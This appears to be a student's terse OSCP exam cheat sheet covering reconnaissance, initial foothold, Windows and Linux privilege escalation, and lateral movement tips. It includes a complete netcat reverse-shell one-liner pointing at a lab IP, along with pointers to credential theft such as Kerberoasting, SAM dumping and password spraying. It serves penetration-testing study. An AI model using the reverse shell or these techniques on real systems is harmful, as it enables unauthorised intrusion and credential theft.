OSCP Memo

Information Gather

namp

• tcp all port (Use -sT and double check)
• Scripts
• udp (eg. SNMP: sudo -sU -p161 or sudo nmap -sU -Pn -min-rate 100 192.168.235.151)
• proxychians -n flag
• nc or telnet unusual ports

ffuf

• Use -mc flag with caution
• Modify /etc/hosts
• Iterative scanning
• Fuzz vhost

smbclient

• -L for $IPC shares
• Using domain account

FTP

• Switch passive to active mode
• Switch bin mode for download

PDF

• View author

Initial foothold

• RFI or NTLMv2 (eg. impaket-smbserver -a ./ -smb2support)
• nc without -e flag? use ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.241 9001 >/tmp/f’

Privilege elevate

Windows

• SeImpersonatePrivilege (eg. PrintSpoofer or jucy-potato NG)
• Services running on internal ports are very important
• set
• PS history (eg. (Get-PSReadlineOption).HistorySavePath)
• windows.old (eg. SAM and SYSTEM)
• KeePass
• Putty (eg. reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions)
• Kerberoast (eg. Rubeus.exe or impacket-GetUserSPNs)
• AS-REP (eg. impaket-GetNPUsers)
• shutdown /r /t 0

Linux

• export
• Services running on internal ports are very important
• history
• backup
• pspy (eg. scheduled tasks detection)
• sudo -l (eg. awk or find)

Post

• .git or git config is important
• VNC Key

Lateral movement

• Credential spraying (eg. crackmapexec, Attention that some rdp services cannot discovered and use –local-auth with caution)
• impaket-mssqlclient use -windows-auth with caution
• Use impaket-psexec, xfreerdp or evil-winrm and if need to specify a domain user, please note use double backslashes for escaping (eg. -u relia.com\\Administrator)